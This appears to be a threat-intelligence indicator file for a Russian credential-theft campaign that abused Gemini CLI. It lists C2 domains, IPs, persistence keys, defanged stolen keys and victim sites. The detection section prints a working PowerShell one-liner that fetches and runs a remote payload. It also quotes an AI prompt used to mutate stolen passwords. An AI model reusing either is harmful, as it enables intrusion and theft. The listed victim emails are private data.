{
  "metadata": {
    "campaign_slug": "russian-gemini-credential-mill-213.165.51.115",
    "campaign_title": "Russian Gemini CLI Credential Mill (UTA-2026-012) — 213.165.51.115 / US healthcare provider",
    "uta_designation": "UTA-2026-012",
    "parent_series": "ai-agent-frameworks-2026-05-23",
    "case_index": "Case 1 of 8 in parent series",
    "report_date": "2026-05-25",
    "first_seen": "2026-03-30",
    "last_active_evidence": "2026-05-23",
    "analyst": "The Hunters Ledger",
    "confidence": "HIGH",
    "tlp": "CLEAR",
    "primary_family": "Custom-Python-A2A-C2 + Gemini-CLI-Augmented-Credential-Mill",
    "threat_level": "CRITICAL",
    "license": "CC BY-NC 4.0",
    "reference": "https://the-hunters-ledger.com/reports/russian-gemini-credential-mill-213.165.51.115/"
  },
  "file_indicators": {
    "ntlm_hashes": [
      {
        "value": "31d6cfe0d16ae931b73c59d7e0c089c0",
        "type": "ntlm",
        "confidence": "DEFINITE",
        "context": "healthcare victim local SAM Administrator account — well-known EMPTY-PASSWORD NTLM hash; operator's initial-access vector",
        "false_positive_risk": "low"
      }
    ],
    "mysql_password_hashes": [],
    "exposed_credential_files": [
      {
        "value": "1PasswordExport-XRAOLK4ZIZHJPDWPVEMGPRDXBE-20260320-060857.csv",
        "type": "filename",
        "confidence": "DEFINITE",
        "context": "Complete 1Password vault export from unidentified victim, dated 2026-03-20; vault ID XRAOLK4ZIZHJPDWPVEMGPRDXBE resolvable by 1Password/AgileBits for victim identification",
        "false_positive_risk": "low"
      },
      {
        "value": "all_wp_30k_logins.txt",
        "type": "filename",
        "confidence": "HIGH",
        "context": "Operator's bulk WordPress site credential dump (~30,000 site credentials, URL/user/pass format)",
        "false_positive_risk": "low"
      },
      {
        "value": "AI_SNIPER_GOODS.txt",
        "type": "filename",
        "confidence": "HIGH",
        "context": "Output file of ai_sniper_brute.py — verified-valid credentials post-AI-mutation. Operator-bespoke filename.",
        "false_positive_risk": "low"
      },
      {
        "value": "ULTRA_GOLD_TARGETS.txt",
        "type": "filename",
        "confidence": "HIGH",
        "context": "Operator's curated target list input to ai_sniper_brute.py. Operator-bespoke filename.",
        "false_positive_risk": "low"
      },
      {
        "value": "AI_ADMIN_MUTANTS.txt",
        "type": "filename",
        "confidence": "HIGH",
        "context": "Operator's 5.5 MB AI-generated admin-credential mutation file. Direct on-disk evidence of LLM-Personalized Credential Mutation novel TTP.",
        "false_positive_risk": "low"
      }
    ]
  },
  "network_indicators": {
    "domains": [
      {
        "value": "tralalarkefe.com",
        "type": "domain",
        "confidence": "DEFINITE",
        "context": "Operator-controlled root domain; all subdomains operator-bound",
        "action": "BLOCK at registrar level",
        "false_positive_risk": "low"
      },
      {
        "value": "c2.tralalarkefe.com",
        "type": "domain",
        "confidence": "DEFINITE",
        "context": "Operator C2 command channel; Cloudflare Tunnel-fronted; requires Mozilla/5.0 User-Agent + X-Agent-ID header",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "payloads.tralalarkefe.com",
        "type": "domain",
        "confidence": "DEFINITE",
        "context": "Operator payload distribution channel; serves run_bg.ps1, agent_final.ps1, stealth.ps1 PowerShell payloads",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "windows_server.tralalarkefe.com",
        "type": "domain",
        "confidence": "DEFINITE",
        "context": "healthcare victim Windows Server (Win 11 Pro, internal IP [victim internal host — redacted], AD domain [victim AD domain — redacted]) Cloudflare Tunnel for operator's WinRM + NetSupport Manager access",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "gil_dr1.tralalarkefe.com",
        "type": "domain",
        "confidence": "DEFINITE",
        "context": "healthcare victim Doctor's PC Cloudflare Tunnel for operator's SSH access (plaintext password [redacted] in operator notes)",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "catchall1.tralalarkefe.com",
        "type": "domain",
        "confidence": "HIGH",
        "context": "Operator Mailpit catch-all email interface (GCP 35.192.41.201); receives all email to *@tralalarkefe.com for burner account registration",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "10101.tralalarkefe.com",
        "type": "domain",
        "confidence": "HIGH",
        "context": "Tunnel alias for payload server at 127.0.0.1:10101",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "tenant-upcoming-great-descending.trycloudflare.com",
        "type": "domain",
        "confidence": "HIGH",
        "context": "Operator's one-time C2-bundle bootstrap tunnel (Cloudflare quick-tunnel address; ephemeral but documented in install_c2_bundle.sh)",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "antipublic.one",
        "type": "domain",
        "confidence": "HIGH",
        "context": "Russian credential-DB service; operator's mass_wp_mutator.py integrates via API key. Outbound from server-class non-research hosts is high-confidence operator signal.",
        "action": "MONITOR",
        "false_positive_risk": "low"
      },
      {
        "value": "generativelanguage.googleapis.com",
        "type": "domain",
        "confidence": "MODERATE",
        "context": "Gemini Generative Language API; operator's check_keys.py validates stolen keys against /v1beta/models endpoint. Egress signature requires tight scoping (server-class hosts only; key-diversity threshold) to avoid developer-environment FPs.",
        "action": "MONITOR",
        "false_positive_risk": "high"
      }
    ],
    "ipv4": [
      {
        "value": "213.165.51.115",
        "type": "ipv4",
        "confidence": "DEFINITE",
        "context": "Primary operator host — AEZA GROUP LLC bulletproof hosting; serves :8082 open directory exposing the entire arsenal/; Hunt first-seen 2026-03-30",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "34.34.81.129",
        "type": "ipv4",
        "confidence": "DEFINITE",
        "context": "Operator Windows C2 fallback — GCP project, europe-west4-a Netherlands; 10 vCPU/40 GB RAM/200 GB SSD; RDP user 'admin'; provisioned 2026-03-25",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "34.34.57.141",
        "type": "ipv4",
        "confidence": "DEFINITE",
        "context": "Operator Ghost Proxy — GCP project, Netherlands; Dante SOCKS5 server on port 1080; all system logs/journald/VPC Flow logs disabled (operator-OPSEC pure passthrough)",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "35.192.41.201",
        "type": "ipv4",
        "confidence": "DEFINITE",
        "context": "Operator Mailpit catch-all — GCP; receives all email to *@tralalarkefe.com; interface at catchall1.tralalarkefe.com",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "95.211.175.167",
        "type": "ipv4",
        "confidence": "HIGH",
        "context": "Webshare proxy IP used by ai_sniper_brute.py for WP brute-force proxy rotation (port 13400, Dutch datacenter range). Operator-shared infrastructure, not operator-owned.",
        "action": "MONITOR",
        "false_positive_risk": "medium"
      },
      {
        "value": "85.17.70.56",
        "type": "ipv4",
        "confidence": "HIGH",
        "context": "Second Webshare proxy IP used by ai_sniper_brute.py (port 13400, Dutch datacenter range). Operator-shared infrastructure, not operator-owned.",
        "action": "MONITOR",
        "false_positive_risk": "medium"
      }
    ],
    "internal_victim_ipv4": [],
    "urls": [
      {
        "value": "https://payloads.tralalarkefe.com/run_bg.ps1",
        "type": "url",
        "confidence": "DEFINITE",
        "context": "Operator's stager PowerShell — first stage of universal infection one-liner",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "https://c2.tralalarkefe.com/api/v1/update",
        "type": "url",
        "confidence": "DEFINITE",
        "context": "Operator C2 beacon check-in endpoint (GET with X-Agent-ID header)",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "https://c2.tralalarkefe.com/api/v1/agents",
        "type": "url",
        "confidence": "DEFINITE",
        "context": "Operator C2 agent enumeration endpoint (defender-takeover endpoint — unauthenticated GET returns full beacon list to any caller)",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "https://c2.tralalarkefe.com/api/v1/interact",
        "type": "url",
        "confidence": "DEFINITE",
        "context": "Operator C2 command-submission endpoint (POST with agent_id + base64(UTF-16LE) task)",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "https://c2.tralalarkefe.com/api/v1/telemetry",
        "type": "url",
        "confidence": "DEFINITE",
        "context": "Operator C2 beacon result-return endpoint (POST with base64(UTF-16LE) results)",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "https://c2.tralalarkefe.com/api/v1/get_results",
        "type": "url",
        "confidence": "HIGH",
        "context": "Client-called endpoint NOT implemented server-side at capture (iterative-dev evidence; missing endpoint indicates operator's C2 codebase is in-progress)",
        "action": "BLOCK",
        "false_positive_risk": "low"
      },
      {
        "value": "https://antipublic.one/api/v2/search",
        "type": "url",
        "confidence": "HIGH",
        "context": "Operator's mass_wp_mutator.py AntiPublic credential-DB lookup endpoint",
        "action": "MONITOR",
        "false_positive_risk": "low"
      }
    ],
    "user_agents": [
      {
        "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "type": "user_agent",
        "confidence": "MODERATE",
        "context": "Mandatory User-Agent for C2 beacon (per operator's notes, Cloudflare blocks with 403/501 otherwise). CLASS-LEVEL signature — DO NOT use alone; combine with X-Agent-ID header and tralalarkefe.com destination.",
        "action": "MONITOR (combined with other indicators)",
        "false_positive_risk": "high"
      }
    ],
    "http_headers": [
      {
        "value": "X-Agent-ID",
        "type": "http_header_name",
        "confidence": "DEFINITE",
        "context": "Operator-bespoke HTTP header for beacon identification. Format: HOSTNAME_user (e.g., <VICTIMHOST>_staff). Combined with tralalarkefe.com destination = high-fidelity operator signal.",
        "action": "MONITOR",
        "false_positive_risk": "low"
      }
    ]
  },
  "host_indicators": {
    "registry_keys": [
      {
        "value": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdateManager",
        "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdateManager",
        "value_data": "C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsUpdateManager.ps1",
        "value_type": "REG_SZ",
        "type": "registry_key",
        "confidence": "HIGH",
        "context": "Operator-documented victim-side persistence path per C2_INFRA_TRANSFER.md. The value name 'WindowsUpdateManager' under HKCU\\Run is operator-bespoke (legitimate Windows Update does not run under HKCU\\Run).",
        "false_positive_risk": "low"
      }
    ],
    "file_paths": [
      {
        "value": "%LOCALAPPDATA%\\Microsoft\\WindowsUpdateManager.ps1",
        "type": "file_path",
        "confidence": "HIGH",
        "context": "Operator-documented persistent beacon file path",
        "false_positive_risk": "low"
      },
      {
        "value": "/root/arsenal/",
        "type": "file_path_operator_side",
        "confidence": "DEFINITE",
        "context": "Operator's primary tooling directory on 213.165.51.115; 4,245 files / 1.43 GB. Contains C2 source, AI tools, credential ledger, victim machine inventory, handoff docs, bulk credential dumps.",
        "false_positive_risk": "low"
      },
      {
        "value": "/root/payloads/",
        "type": "file_path_operator_side",
        "confidence": "DEFINITE",
        "context": "Operator's victim-side PowerShell payload directory on 213.165.51.115. Served by c2_server.py's GET /<filename> file-server endpoint (path-traversal vulnerable).",
        "false_positive_risk": "low"
      },
      {
        "value": "~/.gemini/",
        "type": "directory_pattern",
        "confidence": "MODERATE",
        "context": "Gemini CLI configuration directory — presence on a server-class host combined with offensive tooling is a high-confidence operator signal. Use as filesystem hunt input.",
        "false_positive_risk": "medium"
      }
    ],
    "ad_domain_names": [],
    "wmi_artifacts": [
      {
        "value": "\\\\.\\root\\subscription EventConsumer + EventFilter + FilterToConsumerBinding triplet matching stealth.ps1 fileless persistence pattern",
        "type": "wmi_persistence",
        "confidence": "MODERATE",
        "context": "Operator's stealth.ps1 (per C2_MIGRATION_GUIDE.md) provides WMI + TaskScheduler fileless persistence via __EventConsumer + __EventFilter + __FilterToConsumerBinding triplet. Generic WMI EventConsumer detection signatures apply; a specific persistence-event signature is pending direct analysis of the stealth.ps1 script.",
        "false_positive_risk": "medium"
      }
    ]
  },
  "behavioral_indicators": {
    "c2_wire_signature": [
      {
        "value": "HTTP request to *.tralalarkefe.com with User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) + X-Agent-ID: <HOSTNAME>_<user> header + /api/v1/{update,agents,interact,telemetry,get_results} URI + base64(UTF-16LE) body",
        "type": "c2_wire_pattern",
        "confidence": "DEFINITE",
        "context": "Complete operator C2 wire signature; high-fidelity for SIEM/IDS rule authoring",
        "false_positive_risk": "low"
      },
      {
        "value": "base64(UTF-16LE) command encoding (decode: base64.b64decode(x).decode('utf-16le'))",
        "type": "encoding_pattern",
        "confidence": "DEFINITE",
        "context": "Operator C2 command/result body encoding scheme; no keyed obfuscation. Defenders can decode commands with two stdlib calls.",
        "false_positive_risk": "low"
      },
      {
        "value": "Beacon interval: 5 seconds (default per C2_INFRA_TRANSFER.md)",
        "type": "beacon_cadence",
        "confidence": "HIGH",
        "context": "Operator-documented beacon interval",
        "false_positive_risk": "low"
      }
    ],
    "powershell_stager_signature": [
      {
        "value": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $h = @{'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'}; iex (Invoke-RestMethod -Uri 'https://payloads.tralalarkefe.com/run_bg.ps1' -Headers $h)",
        "type": "powershell_stager",
        "confidence": "DEFINITE",
        "context": "Operator's universal infection one-liner (per C2_INFRA_TRANSFER.md). Catches new compromises at infection time.",
        "false_positive_risk": "low"
      }
    ],
    "operator_side_process_signature": [
      {
        "value": "cloudflared access tcp --hostname *.tralalarkefe.com --url localhost:<port>",
        "type": "process_argv_pattern",
        "confidence": "DEFINITE",
        "context": "argv of the operator's persistent tunnel process into victim hosts (runs on the Linux operator host); captured live in operator session 2026-03-19T22-26 ps output",
        "false_positive_risk": "low"
      }
    ],
    "credential_mutation_pattern": [
      {
        "value": "Outbound HTTPS to generativelanguage.googleapis.com with prompts containing 'Act as an expert red-team password analyst' + 'Most Recent Password from dump' + 'generate exactly 20 likely current mutations'",
        "type": "llm_prompt_pattern",
        "confidence": "DEFINITE",
        "context": "Operator's ai_sniper_brute.py Gemini prompt template — diagnostic signature of LLM-Personalized Credential Mutation novel TTP. For Google's abuse team prompt-content monitoring.",
        "false_positive_risk": "low"
      },
      {
        "value": "Outbound HTTPS to generativelanguage.googleapis.com/v1beta/models?key=AIzaSy* with high key-diversity from single source IP",
        "type": "api_key_validation_pattern",
        "confidence": "HIGH",
        "context": "Operator's check_keys.py validation pattern — high key-diversity (40+ distinct AIzaSy* parameter values) from single source IP is operator signal",
        "false_positive_risk": "medium"
      }
    ],
    "filesystem_hunt_patterns": [
      {
        "value": "Markdown files containing '**To:** Gemini CLI' AND '**From:** Gemini CLI' headers",
        "type": "filesystem_pattern",
        "confidence": "DEFINITE",
        "context": "AI Operator Handoff Document signature (C2_INFRA_TRANSFER.md exemplar). Operator-bespoke AI-to-AI framing.",
        "false_positive_risk": "low"
      },
      {
        "value": "Markdown files containing 'When starting a new session, refer to this file' directive co-located with ~/.gemini/ directory",
        "type": "filesystem_pattern",
        "confidence": "HIGH",
        "context": "AI Operator Handoff Document signature (DEPLOYED_TOOLS.md exemplar). Session-start load directive.",
        "false_positive_risk": "low"
      },
      {
        "value": "Files matching AI_SNIPER_GOODS.txt, AI_ADMIN_MUTANTS.txt, ULTRA_GOLD_TARGETS.txt, *MUTANT*.txt, valid_gemini_keys.txt, gemini_3.1_keys.txt on server-class host",
        "type": "filesystem_pattern",
        "confidence": "HIGH",
        "context": "Operator-bespoke filenames; co-occurrence on a single host is high-fidelity operator signal",
        "false_positive_risk": "low"
      },
      {
        "value": "Russian-language Python comments in offensive tooling: 'Не душим API Gemini', 'Медленно, в 3 потока', 'Инициализация ИИ'",
        "type": "filesystem_pattern",
        "confidence": "DEFINITE",
        "context": "Operator-bespoke Russian-language comments in ai_sniper_brute.py source — uniquely operator-attributable",
        "false_positive_risk": "low"
      }
    ]
  },
  "operator_credentials_for_vendor_disclosure": {
    "note": "All credentials defanged here (first-8 + last-4 chars) per project credential-redaction hygiene rule. Full plaintext in Evidence/russian-arsenal-CREDENTIALS.md for direct vendor T&S disclosure.",
    "gemini_api_keys_stolen": [
      {
        "value_defanged": "AIzaSyD2...QGvo",
        "type": "gemini_api_key",
        "confidence": "DEFINITE",
        "context": "Operator's first Gemini API key (same key hardcoded in ai_sniper_brute.py and check_keys.py). 40+ total keys in operator's check_keys.py inventory. All keys require Google T&S revocation.",
        "ts_recipient": "Google Trust & Safety",
        "action": "REVOKE"
      },
      {
        "value_defanged": "40+ keys total (full list in stage1-malware-analyst.md Section 3.3.2)",
        "type": "gemini_api_key_inventory",
        "confidence": "DEFINITE",
        "context": "Operator's stolen Gemini API key rotation pool. Each key issued to an unidentified victim customer who now bears unauthorized usage charges. Google T&S can identify owning customers from key telemetry.",
        "ts_recipient": "Google Trust & Safety + Google Cloud Security",
        "action": "REVOKE + customer notification"
      }
    ],
    "openai_key": [
      {
        "value_defanged": "sk-proj-X9r...",
        "type": "openai_api_key",
        "confidence": "DEFINITE",
        "context": "Operator-verified working with access to gpt-4.1, gpt-4o, o3-mini per operator's CREDENTIALS.md notes",
        "ts_recipient": "OpenAI Trust & Safety",
        "action": "REVOKE + customer notification"
      }
    ],
    "venice_ai_key": [
      {
        "value_defanged": "VENICE_ADMIN_KEY_xkr...SfoLjTh",
        "type": "venice_admin_key",
        "confidence": "DEFINITE",
        "context": "Operator uses Venice AI (uncensored-LLM API platform) for content mainstream LLMs would refuse",
        "ts_recipient": "Venice AI",
        "action": "REVOKE"
      }
    ],
    "cloudflare_credentials": [
      {
        "value_defanged": "pBkv...BztGF2",
        "type": "cloudflare_api_token",
        "confidence": "DEFINITE",
        "context": "Operator's Cloudflare 'God Mode' API token with Tunnel+Access+DNS Edit + Zone Read scopes",
        "ts_recipient": "Cloudflare PSIRT",
        "action": "REVOKE + account audit"
      },
      {
        "value_defanged": "6dea2ff9...19b671",
        "type": "cloudflare_account_id",
        "confidence": "DEFINITE",
        "context": "Operator's Cloudflare Account ID — PSIRT can audit signup details + payment method + IP history for attribution coordination",
        "ts_recipient": "Cloudflare PSIRT",
        "action": "AUDIT"
      },
      {
        "value_defanged": "6d415863...18f47af5",
        "type": "cloudflare_zone_id",
        "confidence": "DEFINITE",
        "context": "Operator's Cloudflare Zone ID for tralalarkefe.com — PSIRT can teardown tunnel infrastructure",
        "ts_recipient": "Cloudflare PSIRT",
        "action": "TEARDOWN"
      }
    ],
    "github_credentials": [
      {
        "value_defanged": "ghp_tdcX...G4PDaRW",
        "type": "github_pat",
        "confidence": "DEFINITE",
        "context": "Operator's GitHub Personal Access Token for org oravepo546-stack",
        "ts_recipient": "GitHub Trust & Safety",
        "action": "REVOKE + org audit"
      },
      {
        "value_defanged": "sonner1337",
        "type": "github_handle",
        "confidence": "DEFINITE",
        "context": "Operator's primary GitHub identity",
        "ts_recipient": "GitHub Trust & Safety",
        "action": "SUSPEND + cross-reference with oravepo546-stack"
      },
      {
        "value_defanged": "oravepo546-stack",
        "type": "github_org",
        "confidence": "DEFINITE",
        "context": "Operator's secondary GitHub identity (org account)",
        "ts_recipient": "GitHub Trust & Safety",
        "action": "SUSPEND"
      },
      {
        "value_defanged": "github.com/oravepo546-stack/Gemini-CLI-api-key-rotation",
        "type": "github_repo_url",
        "confidence": "DEFINITE",
        "context": "Operator's publicly-published Gemini API key rotation wrapper — open-source release of operator tooling",
        "ts_recipient": "GitHub Trust & Safety",
        "action": "REMOVE"
      }
    ],
    "gcp_credentials": [
      {
        "value_defanged": "geminicli@elated-gizmo-491112-k0.iam.gserviceaccount.com",
        "type": "gcp_service_account",
        "confidence": "DEFINITE",
        "context": "Operator's GCP service account for project elated-gizmo-491112-k0",
        "ts_recipient": "Google Cloud Trust & Safety",
        "action": "REVOKE + audit project"
      },
      {
        "value_defanged": "elated-gizmo-491112-k0",
        "type": "gcp_project_id",
        "confidence": "DEFINITE",
        "context": "Operator-controlled GCP project (existing)",
        "ts_recipient": "Google Cloud Trust & Safety",
        "action": "TAKEDOWN"
      }
    ],
    "antipublic_credentials": [
      {
        "value_defanged": "eyJhbGciOiJ...NpjxlU (jti:44298, sub:31703, iat:1774740637)",
        "type": "antipublic_jwt",
        "confidence": "DEFINITE",
        "context": "Operator's AntiPublic.one paid subscription JWT API key",
        "ts_recipient": "AntiPublic operator",
        "action": "REVOKE + customer correlation"
      }
    ],
    "telegram_artifacts": [
      {
        "value_defanged": "@americanpatriotus",
        "type": "telegram_channel",
        "confidence": "DEFINITE",
        "context": "Operator's co-located US-targeted disinformation channel ('Quantum Patriot'); posted to via Gemini CLI sessions (session 2026-03-25T18-27 captured); anti-fraud / JD Vance themed content rewritten from mainstream RSS via operator's quantum_patriot.py 24/7 automation",
        "ts_recipient": "Telegram Trust & Safety",
        "action": "TERMINATE"
      }
    ]
  },
  "victim_inventory": {
    "primary_named_victim": {
      "name": "US healthcare provider (name redacted)",
      "type": "US dental practice / small healthcare",
      "compromise_evidence": "Full operator-side credential ledger captured: 4 local machine credentials + 4 NTLM hashes (Administrator with EMPTY-PASSWORD hash) + 3 NTLM hashes from a second internal host + 1 OpenDental MySQL root hash + persistent Cloudflare Tunnels (RDP/WinRM + SSH) configured at capture time + dedicated GCP project [victim-named GCP project — redacted] named after victim",
      "disclosure_priority": "Tier 0 (highest — HIPAA-regulated PHI)",
      "disclosure_path": "Direct practice notification + HC3 (HHS Health Sector Cybersecurity Coordination Center) coordination"
    },
    "verified_valid_corporate_wp_victims": [
      "sigsprint.com (contato@sigsprint.com — Brazilian Portuguese-speaking)",
      "galkinlaw.com (wgalkin@galkinlaw.com — US law firm)",
      "opuatechnologies.com (sreed@opuatechnologies.com — US tech SaaS)",
      "averywongphotography.com (info@averywongphotography.com — US photographer)",
      "ddmsuo.eu (josuawilmes@gmail.com — EU)",
      "doyoof.com",
      "mendozatechnologies.com",
      "parkesweatshirtshop.com",
      "allkitchensurfaces.com",
      "indiemotionstudio.com",
      "prixship.com",
      "rawnlaw.com",
      "plaoncorp.com",
      "roanokeweaponry.com",
      "katiemorton.com",
      "musicanet.org",
      "videocartonline.com",
      "annisatravel.com",
      "realwealthmanagement.com",
      "spliceengineering.com",
      "iron-bay.com",
      "designz.com",
      "goodwinboys.com",
      "vakhitova.com",
      "wholesomeharvestfarm.com",
      "youthhockeytraining.com",
      "profotofix.com",
      "ea-ky.com",
      "joelandjess.com",
      "goldxstar.com"
    ],
    "bulk_wp_credentials": {
      "count": "~30,000 WordPress site credentials in all_wp_30k_logins.txt",
      "disclosure_path": "WPScan / Wordfence / Automattic partnership for bulk notification (individual mass-notification infeasible)"
    },
    "stolen_1password_vault_owner": {
      "vault_id": "XRAOLK4ZIZHJPDWPVEMGPRDXBE",
      "export_date": "2026-03-20",
      "compromise_evidence": "1PasswordExport-XRAOLK4ZIZHJPDWPVEMGPRDXBE-20260320-060857.csv on operator's host",
      "disclosure_path": "1Password / AgileBits security team — they can resolve vault ID to customer"
    },
    "llm_api_key_victims": {
      "google_gemini": "40+ unidentified customers per the check_keys.py inventory; Google T&S can identify from key telemetry",
      "openai": "1 unidentified customer; OpenAI T&S can identify from key telemetry",
      "venice_ai": "1 unidentified customer; Venice AI can identify"
    }
  },
  "novel_ttps_anchored_by_this_campaign": [
    {
      "ttp": "AI Operator Handoff Documents",
      "description": "Operator-authored Markdown files written specifically to re-prime new AI agent sessions with full operational context. Treats the AI as a teammate who has lost memory.",
      "exemplars_in_this_campaign": [
        "C2_MIGRATION_GUIDE.md (Russian narrative; implicit instructional tone)",
        "C2_INFRA_TRANSFER.md (explicit '**To:** Gemini CLI / **From:** Gemini CLI' header)",
        "DEPLOYED_TOOLS.md (explicit 'When starting a new session, refer to this file' directive)"
      ],
      "novelty_basis": "First public artifact-level documentation; existing AI-misuse reporting documents AI-generated content (phishing, code), whereas this documents AI-consumed operator documentation (the inverse data flow)",
      "mitre_attack_gap": "No clean fit; closest adjacent is T1587 (Develop Capabilities) but qualitatively distinct; propose new MITRE sub-technique post-publication",
      "confidence": "HIGH"
    },
    {
      "ttp": "LLM-Personalized Credential Mutation",
      "description": "Using a frontier LLM (Gemini 2.5 Flash) at attack time to generate per-target password mutations from email + domain + last-known-password. Replaces hashcat-rules era static password mangling.",
      "exemplars_in_this_campaign": [
        "ai_sniper_brute.py with hardcoded Gemini prompt template",
        "AI_ADMIN_MUTANTS.txt (5.5 MB on-disk evidence of mutation output)",
        "AI_SNIPER_GOODS.txt (verified-valid mutation output)"
      ],
      "novelty_basis": "First public artifact-level documentation of operationalized form; academic LLM-for-password-guessing work exists (PassGAN 2017, more recent LLM-based) but no in-the-wild documented cases in mainstream threat-intel reporting",
      "mitre_attack_gap": "Maps to T1110 (Brute Force) but the LLM-mutation sub-technique is new; propose T1110.005 (LLM-Generated Credential Mutation) to MITRE",
      "confidence": "HIGH"
    },
    {
      "ttp": "Operator-Built Unauthenticated Python-stdlib C2",
      "description": "Operator's custom A2A C2 backend (c2_server.py) is a Python stdlib BaseHTTPServer with zero authentication on any endpoint, path-traversal vulnerable in file-server endpoint, used in active operations against named victims",
      "exemplars_in_this_campaign": [
        "c2_server.py with 5 unauthenticated endpoints",
        "Missing /api/v1/get_results endpoint (client-called but not server-implemented = direct evidence of iterative development)",
        "Multi-instance deployment on ports 8081/8090/10101"
      ],
      "novelty_basis": "Defender-takeover surface is exceptional; custom-rolled unauthenticated C2s used in active operations against named state-owned victims and US healthcare with documented victim machine inventory is rare in published reporting",
      "mitre_attack_gap": "Closest fit T1071.001 (Web Protocols) but unauthenticated-by-design aspect is qualitatively distinct; propose new T1071 sub-technique annotation",
      "confidence": "HIGH"
    }
  ],
  "cross_domain_findings": {
    "ai_augmented_disinformation_operation": {
      "channel": "@americanpatriotus (Telegram)",
      "content_style": "'Quantum Patriot' Q-style anti-fraud / JD Vance themed; mainstream RSS feeds (Fox/CNN/NYT/Reuters/NBC) reinterpreted through 'patriot' lens",
      "automation_script": "quantum_patriot.py running 24/7 via nohup",
      "features": "Automated 07:00 EST morning greetings, EST prime-time scheduling, anti-duplication logic, Telegram-based remote control (/auto on/off commands)",
      "evidence": "Direct posting evidence in session 2026-03-25T18-27-1d86853d.json (Gemini CLI session capturing the operator preparing and posting content)",
      "implication": "Same operator runs credential mill + US-targeted Telegram disinformation operation. Cross-domain operator with mixed financial + ideological motivations. Worth Stanford Internet Observatory / DFRLab cross-domain election-disinfo visibility."
    }
  }
}